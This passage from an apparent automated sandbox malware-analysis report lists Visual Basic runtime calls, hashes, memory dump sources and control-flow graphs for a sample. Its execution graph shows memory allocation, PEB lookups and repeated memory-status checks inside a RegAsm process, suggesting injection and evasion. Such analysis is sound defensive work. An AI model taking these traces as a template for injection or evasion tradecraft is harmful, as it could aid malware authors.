                                                                    • #644.MSVBVM60(?,0054B1B0,00000000,?,0054B190,00000000,?), ref: 0054B344
                                                                    • #644.MSVBVM60(?,0054B1A0,00000000,?,0054B1B0,00000000,?,0054B190,00000000,?), ref: 0054B35D
                                                                      • Part of subcall function 0054B38C: __vbaChkstk.MSVBVM60(?,0054B36F,?,?,0054B1A0,00000000,?,0054B1B0,00000000,?,0054B190,00000000,?), ref: 0054B392
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: #644$Chkstk__vba
                                                                    • String ID:
                                                                    • API String ID: 1305800526-0
                                                                    • Opcode ID: 181d6d5f70a4d4d849f27430d7113cb115196f49caa97232774f408a6f1a0413
                                                                    • Instruction ID: 27d8f87718169baa2795bd51bdf022c2e92fb24db0cf5918baa364638dd8ad18
                                                                    • Opcode Fuzzy Hash: 181d6d5f70a4d4d849f27430d7113cb115196f49caa97232774f408a6f1a0413
                                                                    • Instruction Fuzzy Hash: 5B012871900219BBEB11AF72CC1AAED7F74FF40398F108825FC00AA1A1C775DD10D698
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054B7E3
                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,00401526), ref: 0054B7FB
                                                                    • #717.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401526), ref: 0054B80F
                                                                    • __vbaVarMove.MSVBVM60(?,00000000,00000080,00000000,?,?,?,?,00401526), ref: 0054B81A
                                                                    • __vbaFreeVar.MSVBVM60(0054B84A,?,00000000,00000080,00000000,?,?,?,?,00401526), ref: 0054B844
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#717ChkstkFreeMove
                                                                    • String ID:
                                                                    • API String ID: 3540157982-0
                                                                    • Opcode ID: ab1a7d014dbbe29ea15a2afb88cf0cfbb1eaf08eaa2673af21091a44d3ff13ac
                                                                    • Instruction ID: 1c82cfde3ee95011cd28f8747bd870c61d381ec2681f481a71644f66ff2dcf80
                                                                    • Opcode Fuzzy Hash: ab1a7d014dbbe29ea15a2afb88cf0cfbb1eaf08eaa2673af21091a44d3ff13ac
                                                                    • Instruction Fuzzy Hash: 7EF01D71940248BADB10EB91C982FCDBB7CEB04B48F50847AF1017B0D1EB786B098B69
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8149
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8161
                                                                    • __vbaStrVarVal.MSVBVM60(00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C816B
                                                                    • #644.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C8171
                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000104,00000000,?,?,?,00004008,00401526,?,?,?,0054CF71,00004008), ref: 005C817C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkFreeNofreeVarg
                                                                    • String ID:
                                                                    • API String ID: 1831340853-0
                                                                    • Opcode ID: 9d3a6655a186d40e7b92e2d6a28bb194360452f283882839a803ad74d62758b5
                                                                    • Instruction ID: 939f5b945dfeaef5b02db9d84dbc449400dfb3bc10ae9733ed997b090a995cb2
                                                                    • Opcode Fuzzy Hash: 9d3a6655a186d40e7b92e2d6a28bb194360452f283882839a803ad74d62758b5
                                                                    • Instruction Fuzzy Hash: D8F054B1800208BBCB00EB91CC46FAF7B7CEB44754F14452EB101B71A1DA78694186A8
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C8076
                                                                    • #595.MSVBVM60(?,00401526,?,0000000A,0000000A), ref: 005C80B7
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,00401526,?,0000000A,0000000A), ref: 005C80CC
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,00401526,?,0000000A,0000000A), ref: 005C80DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#595ChkstkFreeListMove
                                                                    • String ID:
                                                                    • API String ID: 2550330671-0
                                                                    • Opcode ID: 0b7c5203ac1eba9ef1bb84ce13d399854d091fdfa57b51b37bec03431b780bab
                                                                    • Instruction ID: d3ac9b0a42fd4699c624edd817dc9bf4b34b5d1655ce44120ab2d991c2380309
                                                                    • Opcode Fuzzy Hash: 0b7c5203ac1eba9ef1bb84ce13d399854d091fdfa57b51b37bec03431b780bab
                                                                    • Instruction Fuzzy Hash: A80105B2800208AFDB01DFD1D942BDEBBBDEB04704F20452AF505AA191D7796A04CF55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?,00401526), ref: 0054DCE9
                                                                    • __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?), ref: 0054DCFE
                                                                    • __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD07
                                                                    • __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkMoveUbound
                                                                    • String ID:
                                                                    • API String ID: 2614284155-0
                                                                    • Opcode ID: 58fc5ea6fd03c023577e3f3d30c069ce85fd0f6325fca40ca70762288b17780b
                                                                    • Instruction ID: 9b6dd94111d553ea0f2725c283f05c7fb2de15440f9a9b03eafbdeffcf44c394
                                                                    • Opcode Fuzzy Hash: 58fc5ea6fd03c023577e3f3d30c069ce85fd0f6325fca40ca70762288b17780b
                                                                    • Instruction Fuzzy Hash: 26F08271840208BFDB10AF81CC56F8DBFB8FB45B44F10483AF4057A1A1D7B919008669
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054CE15
                                                                    • __vbaSetSystemError.MSVBVM60 ref: 0054CE22
                                                                    • __vbaSetSystemError.MSVBVM60(000001F4), ref: 0054CE37
                                                                    • __vbaSetSystemError.MSVBVM60(000001F4), ref: 0054CE44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$Chkstk
                                                                    • String ID:
                                                                    • API String ID: 2749639637-0
                                                                    • Opcode ID: f90d450692569b3a9f01d7e63a20d750b3ec110da7088feadf4255574e2b31ad
                                                                    • Instruction ID: 908e86e652d5b2ea685375b740a6e849d54d4ebb4df870eee72a5a4e066e9063
                                                                    • Opcode Fuzzy Hash: f90d450692569b3a9f01d7e63a20d750b3ec110da7088feadf4255574e2b31ad
                                                                    • Instruction Fuzzy Hash: 1AF0DA71E0030AABCF00EBE6C9565ADBBB4BF0470CF10496AE810B72C1DB7D9651CB5A

                                                                    Execution Graph

                                                                    Execution Coverage:5.4%
                                                                    Dynamic/Decrypted Code Coverage:85.8%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:106
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph 39333 10f0848 39334 10f084e 39333->39334 39335 10f091b 39334->39335 39337 10f1382 39334->39337 39339 10f138b 39337->39339 39338 10f1488 39338->39334 39339->39338 39341 10f7ec0 39339->39341 39342 10f7eca 39341->39342 39343 10f7ee4 39342->39343 39346 597d9fb 39342->39346 39351 597da08 39342->39351 39343->39339 39348 597da1d 39346->39348 39347 597dc32 39347->39343 39348->39347 39349 597dc58 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39348->39349 39350 597dc48 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39348->39350 39349->39348 39350->39348 39353 597da1d 39351->39353 39352 597dc32 39352->39343 39353->39352 39354 597dc58 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39353->39354 39355 597dc48 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39353->39355 39354->39353 39355->39353 39375 67fc5c8 39376 67fc5f3 39375->39376 39377 67fc6a2 39376->39377 39379 67fd490 39376->39379 39381 67fd496 39379->39381 39380 67fd4a6 39380->39377 39381->39380 39382 67fd5b3 CreateWindowExW 39381->39382 39383 67fd614 39382->39383 39384 44395c NtAllocateVirtualMemory 39385 443a8f 39384->39385 39356 44148d 39359 4438cd GetPEB 39356->39359 39386 109d030 39387 109d048 39386->39387 39388 109d0a2 39387->39388 39393 67fd697 39387->39393 39397 67fe7f8 39387->39397 39406 67fd6a8 39387->39406 39410 67fa48c 39387->39410 39394 67fd6a5 39393->39394 39395 67fa48c 2 API calls 39394->39395 39396 67fd6ef 39395->39396 39396->39388 39398 67fe835 39397->39398 39399 67fe869 39398->39399 39401 67fe859 39398->39401 39402 67fe867 39399->39402 39435 67fe46c 39399->39435 39419 67fea5c 39401->39419 39425 67fe980 39401->39425 39430 67fe990 39401->39430 39402->39402 39407 67fd6ce 39406->39407 39408 67fa48c 2 API calls 39407->39408 39409 67fd6ef 39408->39409 39409->39388 39411 67fa497 39410->39411 39412 67fe869 39411->39412 39414 67fe859 39411->39414 39413 67fe46c 2 API calls 39412->39413 39415 67fe867 39412->39415 39413->39415 39416 67fea5c 2 API calls 39414->39416 39417 67fe990 2 API calls 39414->39417 39418 67fe980 2 API calls 39414->39418 39415->39415 39416->39415 39417->39415 39418->39415 39420 67fea1a 39419->39420 39421 67fea6a 39419->39421 39442 67fea38 39420->39442 39446 67fea48 39420->39446 39422 67fea30 39422->39402 39427 67fe991 39425->39427 39426 67fea30 39426->39402 39428 67fea48 2 API calls 39427->39428 39429 67fea38 2 API calls 39427->39429 39428->39426 39429->39426 39431 67fe9a4 39430->39431 39433 67fea48 2 API calls 39431->39433 39434 67fea38 2 API calls 39431->39434 39432 67fea30 39432->39402 39433->39432 39434->39432 39436 67fe477 39435->39436 39437 67ffd1c 39436->39437 39438 67ffc72 39436->39438 39439 67fa48c CallWindowProcW 39437->39439 39440 67ffcca CallWindowProcW 39438->39440 39441 67ffc79 39438->39441 39439->39441 39440->39441 39441->39402 39443 67fea48 39442->39443 39444 67fea59 39443->39444 39449 67ffc00 39443->39449 39444->39422 39447 67fea59 39446->39447 39448 67ffc00 2 API calls 39446->39448 39447->39422 39448->39447 39450 67ffc16 39449->39450 39451 67ffc10 39449->39451 39459 67fe46c CallWindowProcW 39450->39459 39460 67ffc00 CallWindowProcW 39450->39460 39452 67fe46c CallWindowProcW 39451->39452 39452->39450 39453 67ffc1a 39453->39444 39454 67ffd1c 39453->39454 39455 67ffc72 39453->39455 39456 67fa48c CallWindowProcW 39454->39456 39457 67ffcca CallWindowProcW 39455->39457 39458 67ffc79 39455->39458 39456->39458 39457->39458 39458->39444 39459->39453 39460->39453 39360 44436e 39361 4439c3 39360->39361 39362 444391 NtAllocateVirtualMemory 39361->39362 39363 4442e6 39362->39363 39368 441608 39369 441d6c 39368->39369 39373 44392e GetPEB 39369->39373 39374 4438fd 39373->39374 39461 44189b 39462 4418a1 39461->39462 39465 443d4b GetPEB 39462->39465
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $tq$$tq$$tq$$tq$$tq$$tq
                                                                    • API String ID: 0-2574395493
                                                                    • Opcode ID: c619d40b665746fcf963d1b6a148cff515a8365f2ae11d62cc16f84c0b2bba6b
                                                                    • Instruction ID: 8dab5ad37731dc277d272d02daddc7f2c9d574a6cd61405049c4f44f03a56556
                                                                    • Opcode Fuzzy Hash: c619d40b665746fcf963d1b6a148cff515a8365f2ae11d62cc16f84c0b2bba6b
                                                                    • Instruction Fuzzy Hash: C4528070B0410D8FDF24DB69D584BAEB7BAFB89310F648526E409EB395DB34DC818B91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 738 5975d50-5975d6e 739 5975d70-5975d73 738->739 740 5975d75-5975d83 739->740 741 5975d8a-5975d8d 739->741 750 5975df6-5975e0c 740->750 751 5975d85 740->751 742 5975d8f-5975da9 741->742 743 5975dae-5975db1 741->743 742->743 744 5975dd4-5975dd7 743->744 745 5975db3-5975dcf 743->745 748 5975de4-5975de6 744->748 749 5975dd9-5975de3 744->749 745->744 753 5975ded-5975df0 748->753 754 5975de8 748->754 757 5976027-5976031 750->757 758 5975e12-5975e1b 750->758 751->741 753->739 753->750 754->753 760 5976032-5976067 758->760 761 5975e21-5975e3e 758->761 764 5976069-597606c 760->764 768 5976014-5976021 761->768 769 5975e44-5975e6c 761->769 766 5976072-5976081 764->766 767 59762a1-59762a4 764->767 775 5976083-597609e 766->775 776 59760a0-59760e4 766->776 770 59762c7-59762ca 767->770 771 59762a6-59762c2 767->771 768->757 768->758 769->768 795 5975e72-5975e7b 769->795 772 5976375-5976377 770->772 773 59762d0-59762dc 770->773 771->770 778 597637e-5976381 772->778 779 5976379 772->779 781 59762e7-59762e9 773->781 775->776 789 5976275-597628a 776->789 790 59760ea-59760fb 776->790 778->764 782 5976387-5976390 778->782 779->778 786 5976301-5976305 781->786 787 59762eb-59762f1 781->787 793 5976307-5976311 786->793 794 5976313 786->794 791 59762f5-59762f7 787->791 792 59762f3 787->792 789->767 804 5976101-597611e 790->804 805 5976260-597626f 790->805 791->786 792->786 799 5976318-597631a 793->799 794->799 795->760 796 5975e81-5975e9d 795->796 807 5975ea3-5975ecd 796->807 808 5976002-597600e 796->808 801 597631c-597631f 799->801 802 597632b-5976364 799->802 801->782 802->766 820 597636a-5976374 802->820 804->805 814 5976124-597621a call 5974570 804->814 805->789 805->790 821 5975ed3-5975efb 807->821 822 5975ff8-5975ffd 807->822 808->768 808->795 870 597621c-5976226 814->870 871 5976228 814->871 821->822 829 5975f01-5975f2f 821->829 822->808 829->822 834 5975f35-5975f3e 829->834 834->822 835 5975f44-5975f76 834->835 843 5975f81-5975f9d 835->843 844 5975f78-5975f7c 835->844 843->808 847 5975f9f-5975ff6 call 5974570 843->847 844->822 846 5975f7e 844->846 846->843 847->808 872 597622d-597622f 870->872 871->872 872->805 873 5976231-5976236 872->873 874 5976244 873->874 875 5976238-5976242 873->875 876 5976249-597624b 874->876 875->876 876->805 877 597624d-5976259 876->877 877->805
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $tq$$tq
                                                                    • API String ID: 0-1837209516
                                                                    • Opcode ID: f5caa288929e7aef8a918f0f965952375a3d4481d8b9cf9b2ad0260ee08a3774
                                                                    • Instruction ID: adc31b1bbafc28d5744f7c59fba381e95b8287bf1116015444dd7130acfeb8a6
                                                                    • Opcode Fuzzy Hash: f5caa288929e7aef8a918f0f965952375a3d4481d8b9cf9b2ad0260ee08a3774
                                                                    • Instruction Fuzzy Hash: 82027070B0061A8FDB18DB75D494A6EB7B6FF84310F14852AE405EB395DB35ED86CB80

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1009 597e0e8-597e0fa 1010 597e15e-597e165 1009->1010 1011 597e0fc-597e129 call 597d1b8 call 597d094 1009->1011 1018 597e12e-597e13b 1011->1018 1020 597e166-597e1cd 1018->1020 1021 597e13d-597e156 1018->1021 1031 597e1d6-597e1e6 1020->1031 1032 597e1cf-597e1d1 1020->1032 1021->1010 1034 597e1ed-597e1fd 1031->1034 1035 597e1e8 1031->1035 1033 597e475-597e47c 1032->1033 1037 597e203-597e211 1034->1037 1038 597e45c-597e46a 1034->1038 1035->1033 1041 597e217 1037->1041 1042 597e47d-597e4f6 1037->1042 1038->1042 1043 597e46c-597e46e 1038->1043 1041->1042 1044 597e3b6-597e3dc 1041->1044 1045 597e235-597e256 1041->1045 1046 597e2f4-597e315 1041->1046 1047 597e374-597e3b1 1041->1047 1048 597e450-597e45a 1041->1048 1049 597e21e-597e230 1041->1049 1050 597e25b-597e27d 1041->1050 1051 597e31a-597e342 1041->1051 1052 597e347-597e36f 1041->1052 1053 597e282-597e2a3 1041->1053 1054 597e3e1-597e40d 1041->1054 1055 597e40f-597e42a 1041->1055 1056 597e2ce-597e2ef 1041->1056 1057 597e42c-597e44e 1041->1057 1058 597e2a8-597e2c9 1041->1058 1043->1033 1044->1033 1045->1033 1046->1033 1047->1033 1048->1033 1049->1033 1050->1033 1051->1033 1052->1033 1053->1033 1054->1033 1055->1033 1056->1033 1057->1033 1058->1033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xxq$$tq
                                                                    • API String ID: 0-142404150
                                                                    • Opcode ID: 662f3fffb43c9332ebbc95cde89466208059a99af8acd3767e7bc8e9a9c6b645
                                                                    • Instruction ID: 9336b26b681b9a49e0f1b89d8bf8d1ca6f8d03555b582caefdb9611170f05f92
                                                                    • Opcode Fuzzy Hash: 662f3fffb43c9332ebbc95cde89466208059a99af8acd3767e7bc8e9a9c6b645
                                                                    • Instruction Fuzzy Hash: C4B1B370B042199BCB18EF78945467EBBBBBFC8740B05856EE446DB388DE39DC028795
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f475c1d266386655eba2effd74833af3b35e4e3a82bc585adc5bc7105afe934
                                                                    • Instruction ID: 7cb3eba40b73793bcb769785730d2765c3201f723005a65050007a87a0002221
                                                                    • Opcode Fuzzy Hash: 7f475c1d266386655eba2effd74833af3b35e4e3a82bc585adc5bc7105afe934
                                                                    • Instruction Fuzzy Hash: BA53F631C10B1A8ADB51EF68C880699F7B1FF99300F51D79AE49877125FB70AAC5CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eedbe996eeee942919208b4760a2a59b49be7657c0e5fab0fe070c0f124e438f
                                                                    • Instruction ID: 45cfbaad4f9abc8c456c76d948f502babd5d6c593b932c41df7b0ecdf2c51657
                                                                    • Opcode Fuzzy Hash: eedbe996eeee942919208b4760a2a59b49be7657c0e5fab0fe070c0f124e438f
                                                                    • Instruction Fuzzy Hash: 6E331E31D1071A8EDB11EF68C88069DF7B1FF99300F55C69AE548A7225EB70EAC5CB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2229 44395c-44396e NtAllocateVirtualMemory 2230 443b35 2229->2230 2231 443a8f-443e7c 2230->2231 2232 443b3b-443dd9 2230->2232
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(000000FF), ref: 0044396A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4154134702.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_440000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: a264d261c1b0493561de4f9e0d8715a82a6f349e06cd1d78d1bc1e7ab9ddc151
                                                                    • Instruction ID: 57550a90abf8859a019dce8097a4e11dae0b2e094b829864a1e91121928c7047
                                                                    • Opcode Fuzzy Hash: a264d261c1b0493561de4f9e0d8715a82a6f349e06cd1d78d1bc1e7ab9ddc151
                                                                    • Instruction Fuzzy Hash: E7D0236034C243DAF7090F54581617237F4470173673007839023D10D0CAECD7535517

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2235 10f3e88-10f3eee 2237 10f3f38-10f3f3a 2235->2237 2238 10f3ef0-10f3efb 2235->2238 2239 10f3f3c-10f3f94 2237->2239 2238->2237 2240 10f3efd-10f3f09 2238->2240 2249 10f3fde-10f3fe0 2239->2249 2250 10f3f96-10f3fa1 2239->2250 2241 10f3f2c-10f3f36 2240->2241 2242 10f3f0b-10f3f15 2240->2242 2241->2239 2243 10f3f19-10f3f28 2242->2243 2244 10f3f17 2242->2244 2243->2243 2246 10f3f2a 2243->2246 2244->2243 2246->2241 2252 10f3fe2-10f3ffa 2249->2252 2250->2249 2251 10f3fa3-10f3faf 2250->2251 2253 10f3fd2-10f3fdc 2251->2253 2254 10f3fb1-10f3fbb 2251->2254 2259 10f3ffc-10f4007 2252->2259 2260 10f4044-10f4046 2252->2260 2253->2252 2256 10f3fbf-10f3fce 2254->2256 2257 10f3fbd 2254->2257 2256->2256 2258 10f3fd0 2256->2258 2257->2256 2258->2253 2259->2260 2262 10f4009-10f4015 2259->2262 2261 10f4048-10f4096 2260->2261 2270 10f409c-10f40aa 2261->2270 2263 10f4038-10f4042 2262->2263 2264 10f4017-10f4021 2262->2264 2263->2261 2265 10f4025-10f4034 2264->2265 2266 10f4023 2264->2266 2265->2265 2268 10f4036 2265->2268 2266->2265 2268->2263 2271 10f40ac-10f40b2 2270->2271 2272 10f40b3-10f4113 2270->2272 2271->2272 2279 10f4115-10f4119 2272->2279 2280 10f4123-10f4127 2272->2280 2279->2280 2281 10f411b 2279->2281 2282 10f4129-10f412d 2280->2282 2283 10f4137-10f413b 2280->2283 2281->2280 2282->2283 2284 10f412f-10f4132 call 10f0ab8 2282->2284 2285 10f413d-10f4141 2283->2285 2286 10f414b-10f414f 2283->2286 2284->2283 2285->2286 2288 10f4143-10f4146 call 10f0ab8 2285->2288 2289 10f415f-10f4163 2286->2289 2290 10f4151-10f4155 2286->2290 2288->2286 2293 10f4165-10f4169 2289->2293 2294 10f4173-10f4177 2289->2294 2290->2289 2292 10f4157-10f415a call 10f0ab8 2290->2292 2292->2289 2293->2294 2295 10f416b 2293->2295 2296 10f4179-10f417d 2294->2296 2297 10f4187 2294->2297 2295->2294 2296->2297 2299 10f417f 2296->2299 2300 10f4188 2297->2300 2299->2297 2300->2300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \V]m
                                                                    • API String ID: 0-4105700344
                                                                    • Opcode ID: 70a57cc79af446a96a9df6f9b64b80c27324e22ae6647c5fa06241ec32e1320b
                                                                    • Instruction ID: 315934375400621b8ffbc58d9f003359986cba6c982362b5657aa536d83e751a
                                                                    • Opcode Fuzzy Hash: 70a57cc79af446a96a9df6f9b64b80c27324e22ae6647c5fa06241ec32e1320b
                                                                    • Instruction Fuzzy Hash: 71915C70E002099FDB54CFA9C9867DEBBF2BF88314F14812DE945EB694DB749845CB81
                                                                    Memory Dump Source
